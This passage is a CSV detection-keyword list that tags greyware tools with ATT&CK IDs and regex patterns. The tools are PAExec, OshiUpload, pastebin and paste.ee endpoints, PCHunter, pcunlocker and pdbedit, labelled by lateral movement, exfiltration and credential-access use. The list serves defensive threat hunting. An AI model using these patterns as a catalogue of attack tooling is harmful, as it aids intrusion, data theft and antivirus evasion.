"*OshiUpload-master.zip*",".{0,1000}OshiUpload\-master\.zip.{0,1000}","greyware_tool_keyword","OshiUpload","Ephemeral file sharing engine","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/somenonymous/OshiUpload","1","1","N/A","N/A","10","2","168","24","2022-10-01T04:08:29Z","2019-05-11T02:08:51Z" "*reverse_proxy_tcp.txt*",".{0,1000}reverse_proxy_tcp\.txt.{0,1000}","greyware_tool_keyword","OshiUpload","Ephemeral file sharing engine","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/somenonymous/OshiUpload","1","0","N/A","N/A","10","2","168","24","2022-10-01T04:08:29Z","2019-05-11T02:08:51Z" "*somenonymous/OshiUpload*",".{0,1000}somenonymous\/OshiUpload.{0,1000}","greyware_tool_keyword","OshiUpload","Ephemeral file sharing engine","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/somenonymous/OshiUpload","1","1","N/A","N/A","10","2","168","24","2022-10-01T04:08:29Z","2019-05-11T02:08:51Z" "* -csrc C:\\Windows\\notepad.exe -c cmd.exe*",".{0,1000}\s\-csrc\sC\:\\\\Windows\\\\notepad\.exe\s\-c\scmd\.exe.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z" "* PAExec service*",".{0,1000}\sPAExec\sservice.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z" 
"*%SYSTEMROOT%\PAExec-*",".{0,1000}\%SYSTEMROOT\%\\PAExec\-.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z" "*/PAExec.cpp*",".{0,1000}\/PAExec\.cpp.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","1","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z" "*/paexec.exe",".{0,1000}\/paexec\.exe","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","1","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z" "*/PAExec.git*",".{0,1000}\/PAExec\.git.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","1","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z" "*/paexec_eula.txt*",".{0,1000}\/paexec_eula\.txt.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral 
Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z" "*\PAExec.cpp*",".{0,1000}\\PAExec\.cpp.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","1","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z" "*\PAExec.exe*",".{0,1000}\\PAExec\.exe.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z" "*\PAEXEC.EXE-*.pf*",".{0,1000}\\PAEXEC\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z" "*\PAExec.log*",".{0,1000}\\PAExec\.log.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z" "*\paexec.obj*",".{0,1000}\\paexec\.obj.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - 
TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z" "*\paexec.pdb*",".{0,1000}\\paexec\.pdb.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z" "*\PAExec.sln*",".{0,1000}\\PAExec\.sln.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z" "*\PAExec\*.exe*",".{0,1000}\\PAExec\\.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z" "*\paexec_eula.txt*",".{0,1000}\\paexec_eula\.txt.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z" "*\PAExec_Move*",".{0,1000}\\PAExec_Move.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - 
T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z" "*\pipe\PAExecErr*",".{0,1000}\\pipe\\PAExecErr.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","#namedpipe","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z" "*\pipe\PAExecIn*",".{0,1000}\\pipe\\PAExecIn.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","#namedpipe","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z" "*\pipe\PAExecOut*",".{0,1000}\\pipe\\PAExecOut.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","#namedpipe","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z" "*2FEB96F5-08E6-48A3-B306-794277650A08*",".{0,1000}2FEB96F5\-08E6\-48A3\-B306\-794277650A08.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","#GUIDproject","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z" 
"*2FEB96F5-08E6-48A3-B306-794277650A08*",".{0,1000}2FEB96F5\-08E6\-48A3\-B306\-794277650A08.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","#GUIDproject","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z" "*Description'>PAExec Application*",".{0,1000}Description\'\>PAExec\sApplication.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z" "*'Details'>paexec application*",".{0,1000}\'Details\'\>paexec\sapplication.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","registry value","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z" "*HINT: PAExec probably needs to be *",".{0,1000}HINT\:\sPAExec\sprobably\sneeds\sto\sbe\s.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z" "*paexec \\*",".{0,1000}paexec\s\\\\.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - 
T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z" "*PAExec error waiting for app to exit*",".{0,1000}PAExec\serror\swaiting\sfor\sapp\sto\sexit.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z" "*PAExec service *",".{0,1000}PAExec\sservice\s.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z" "*PAExec starting process*",".{0,1000}PAExec\sstarting\sprocess.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z" "*PAExec timed out waiting for app to exit*",".{0,1000}PAExec\stimed\sout\swaiting\sfor\sapp\sto\sexit.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z" "*paexec.exe 
\\*",".{0,1000}paexec\.exe\s\\\\.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z" "*PAExec.exe -u *",".{0,1000}PAExec\.exe\s\-u\s.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z" "*PAExec-master.zip*",".{0,1000}PAExec\-master\.zip.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","1","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z" "*poweradmin.com/PAExec*",".{0,1000}poweradmin\.com\/PAExec.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","1","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z" "*poweradminllc/PAExec*",".{0,1000}poweradminllc\/PAExec.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral 
Movement","https://github.com/poweradminllc/PAExec","1","1","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z" "*passwd*john*",".{0,1000}passwd.{0,1000}john.{0,1000}","greyware_tool_keyword","passwd","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*paste.ee/d/*",".{0,1000}paste\.ee\/d\/.{0,1000}","greyware_tool_keyword","paste.ee","fetching data from paste.ee","T1041","TA0009","N/A","N/A","Collection","paste.ee","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*paste.ee/paste*",".{0,1000}paste\.ee\/paste.{0,1000}","greyware_tool_keyword","paste.ee","posting data on paste.ee","T1041","TA0010","N/A","N/A","Data Exfiltration","paste.ee","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*pastebin.com*/raw/* ",".{0,1000}pastebin\.com.{0,1000}\/raw\/.{0,1000}\s","greyware_tool_keyword","pastebin","pastebin raw access content - abused by malwares to retrieve payloads","T1119","TA0009","Redline Stealer","N/A","Collection","pastebin.com","1","1","N/A","greyware tool - risks of False positive !","8","10","N/A","N/A","N/A","N/A" "*pastebin.com*/rw/*",".{0,1000}pastebin\.com.{0,1000}\/rw\/.{0,1000}","greyware_tool_keyword","pastebin","pastebin raw access content - abused by malwares to retrieve payloads","T1119","TA0009","Redline Stealer","N/A","Collection","pastebin.com","1","1","N/A","greyware tool - risks of False positive !","8","10","N/A","N/A","N/A","N/A" "*pastebin.com*api/api_post.php*",".{0,1000}pastebin\.com.{0,1000}api\/api_post\.php.{0,1000}","greyware_tool_keyword","pastebin","pastebin POST url - abused by malwares to exfiltrate 
information","T1102 - T1048 - T1094 - T1608.001","TA0011","N/A","N/A","Data Exfiltration","pastebin.com","1","1","N/A","greyware tool - risks of False positive !","8","10","N/A","N/A","N/A","N/A" "*/PCHunter.exe*",".{0,1000}\/PCHunter\.exe.{0,1000}","greyware_tool_keyword","PCHunter","PCHunter is a toolkit offering deep access to kernel setting - processes - network and startup configurations. It's designed to detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Conti - 8BASE - TargetCompany - Hive - Qilin","Defense Evasion","https://www.majorgeeks.com/files/details/pc_hunter.html","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*/PCHunter_free.zip*",".{0,1000}\/PCHunter_free\.zip.{0,1000}","greyware_tool_keyword","PCHunter","PCHunter is a toolkit offering deep access to kernel setting - processes - network and startup configurations. It's designed to detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Conti - 8BASE - TargetCompany - Hive - Qilin","Defense Evasion","https://www.majorgeeks.com/files/details/pc_hunter.html","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*\AppData\Local\Temp\PCHunter.sys*",".{0,1000}\\AppData\\Local\\Temp\\PCHunter\.sys.{0,1000}","greyware_tool_keyword","PCHunter","PCHunter is a toolkit offering deep access to kernel setting - processes - network and startup configurations. 
It's designed to detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Conti - 8BASE - TargetCompany - Hive - Qilin","Defense Evasion","https://www.majorgeeks.com/files/details/pc_hunter.html","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*\ControlSet001\Services\PCHunter*",".{0,1000}\\ControlSet001\\Services\\PCHunter.{0,1000}","greyware_tool_keyword","PCHunter","PCHunter is a toolkit offering deep access to kernel setting - processes - network and startup configurations. It's designed to detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Conti - 8BASE - TargetCompany - Hive - Qilin","Defense Evasion","https://www.majorgeeks.com/files/details/pc_hunter.html","1","0","#registry #servicename","N/A","8","10","N/A","N/A","N/A","N/A" "*\PCHunter.exe*",".{0,1000}\\PCHunter\.exe.{0,1000}","greyware_tool_keyword","PCHunter","PCHunter is a toolkit offering deep access to kernel setting - processes - network and startup configurations. It's designed to detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Conti - 8BASE - TargetCompany - Hive - Qilin","Defense Evasion","https://www.majorgeeks.com/files/details/pc_hunter.html","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*\PCHunter_free.zip*",".{0,1000}\\PCHunter_free\.zip.{0,1000}","greyware_tool_keyword","PCHunter","PCHunter is a toolkit offering deep access to kernel setting - processes - network and startup configurations. 
It's designed to detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Conti - 8BASE - TargetCompany - Hive - Qilin","Defense Evasion","https://www.majorgeeks.com/files/details/pc_hunter.html","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*\PCHunter64ar.sys*",".{0,1000}\\PCHunter64ar\.sys.{0,1000}","greyware_tool_keyword","PCHunter","PCHunter is a toolkit offering deep access to kernel setting - processes - network and startup configurations. It's designed to detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Conti - 8BASE - TargetCompany - Hive - Qilin","Defense Evasion","https://www.majorgeeks.com/files/details/pc_hunter.html","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*>Epoolsoft Windows Information View Tools<*",".{0,1000}\>Epoolsoft\sWindows\sInformation\sView\sTools\<.{0,1000}","greyware_tool_keyword","PCHunter","PCHunter is a toolkit offering deep access to kernel setting - processes - network and startup configurations. It's designed to detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Conti - 8BASE - TargetCompany - Hive - Qilin","Defense Evasion","https://www.majorgeeks.com/files/details/pc_hunter.html","1","0","#description","N/A","8","10","N/A","N/A","N/A","N/A" "*>PC Hunter<*",".{0,1000}\>PC\sHunter\<.{0,1000}","greyware_tool_keyword","PCHunter","PCHunter is a toolkit offering deep access to kernel setting - processes - network and startup configurations. 
It's designed to detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Conti - 8BASE - TargetCompany - Hive - Qilin","Defense Evasion","https://www.majorgeeks.com/files/details/pc_hunter.html","1","0","#productname","N/A","8","10","N/A","N/A","N/A","N/A" "*>PCHunter.sys<*",".{0,1000}\>PCHunter\.sys\<.{0,1000}","greyware_tool_keyword","PCHunter","PCHunter is a toolkit offering deep access to kernel setting - processes - network and startup configurations. It's designed to detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Conti - 8BASE - TargetCompany - Hive - Qilin","Defense Evasion","https://www.majorgeeks.com/files/details/pc_hunter.html","1","0","#productname","N/A","8","10","N/A","N/A","N/A","N/A" "*648eaadf2d81af9ea6792d48740aa3ef4787303f95a0e2abaf23b87b13758eb7*",".{0,1000}648eaadf2d81af9ea6792d48740aa3ef4787303f95a0e2abaf23b87b13758eb7.{0,1000}","greyware_tool_keyword","PCHunter","PCHunter is a toolkit offering deep access to kernel setting - processes - network and startup configurations. It's designed to detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Conti - 8BASE - TargetCompany - Hive - Qilin","Defense Evasion","https://www.majorgeeks.com/files/details/pc_hunter.html","1","0","#filehash","N/A","8","10","N/A","N/A","N/A","N/A" "*http://www.epoolsoft.com/pchunter/pchunter_free*",".{0,1000}http\:\/\/www\.epoolsoft\.com\/pchunter\/pchunter_free.{0,1000}","greyware_tool_keyword","PCHunter","PCHunter is a toolkit offering deep access to kernel setting - processes - network and startup configurations. 
It's designed to detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Conti - 8BASE - TargetCompany - Hive - Qilin","Defense Evasion","https://www.majorgeeks.com/files/details/pc_hunter.html","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*http://www.epoolsoft.com/PCHunter_Standard*",".{0,1000}http\:\/\/www\.epoolsoft\.com\/PCHunter_Standard.{0,1000}","greyware_tool_keyword","PCHunter","PCHunter is a toolkit offering deep access to kernel setting - processes - network and startup configurations. It's designed to detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Conti - 8BASE - TargetCompany - Hive - Qilin","Defense Evasion","https://www.majorgeeks.com/files/details/pc_hunter.html","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*https://www.majorgeeks.com/files/details/pc_hunter.html*",".{0,1000}https\:\/\/www\.majorgeeks\.com\/files\/details\/pc_hunter\.html.{0,1000}","greyware_tool_keyword","PCHunter","PCHunter is a toolkit offering deep access to kernel setting - processes - network and startup configurations. It's designed to detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Conti - 8BASE - TargetCompany - Hive - Qilin","Defense Evasion","https://www.majorgeeks.com/files/details/pc_hunter.html","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*PCHunter32.exe*",".{0,1000}PCHunter32\.exe.{0,1000}","greyware_tool_keyword","PCHunter","PCHunter is a toolkit offering deep access to kernel setting - processes - network and startup configurations. 
It's designed to detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Conti - 8BASE - TargetCompany - Hive - Qilin","Defense Evasion","https://www.majorgeeks.com/files/details/pc_hunter.html","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*PCHunter64.exe*",".{0,1000}PCHunter64\.exe.{0,1000}","greyware_tool_keyword","PCHunter","PCHunter is a toolkit offering deep access to kernel setting - processes - network and startup configurations. It's designed to detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Conti - 8BASE - TargetCompany - Hive - Qilin","Defense Evasion","https://www.majorgeeks.com/files/details/pc_hunter.html","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*/download/pcunlocker*",".{0,1000}\/download\/pcunlocker.{0,1000}","greyware_tool_keyword","pcunlocker","Reset and unlock forgotten Windows login password","T1078","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://www.pcunlocker.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/pcunlocker.iso*",".{0,1000}\/pcunlocker\.iso.{0,1000}","greyware_tool_keyword","pcunlocker","Reset and unlock forgotten Windows login password","T1078","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://www.pcunlocker.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/pcunlocker_trial.zip*",".{0,1000}\/pcunlocker_trial\.zip.{0,1000}","greyware_tool_keyword","pcunlocker","Reset and unlock forgotten Windows login password","T1078","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://www.pcunlocker.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\pcunlocker.iso*",".{0,1000}\\pcunlocker\.iso.{0,1000}","greyware_tool_keyword","pcunlocker","Reset and unlock forgotten Windows login password","T1078","TA0005 - TA0006 - 
TA0009","N/A","N/A","Credential Access","https://www.pcunlocker.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\pcunlocker_trial.zip*",".{0,1000}\\pcunlocker_trial\.zip.{0,1000}","greyware_tool_keyword","pcunlocker","Reset and unlock forgotten Windows login password","T1078","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://www.pcunlocker.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*pcunlocker_ent_trial.zip*",".{0,1000}pcunlocker_ent_trial\.zip.{0,1000}","greyware_tool_keyword","pcunlocker","Reset and unlock forgotten Windows login password","T1078","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://www.pcunlocker.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*pdbedit -L -v*",".{0,1000}pdbedit\s\-L\s\-v.{0,1000}","greyware_tool_keyword","pdbedit","Sets the smbpasswd listing format. It will make pdbedit list the users in the database - printing out the account fields in a format compatible with the smbpasswd file format.","T1003.003 - T1087.001","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*pdbedit -L -w*",".{0,1000}pdbedit\s\-L\s\-w.{0,1000}","greyware_tool_keyword","pdbedit","Enables the verbose listing format. 
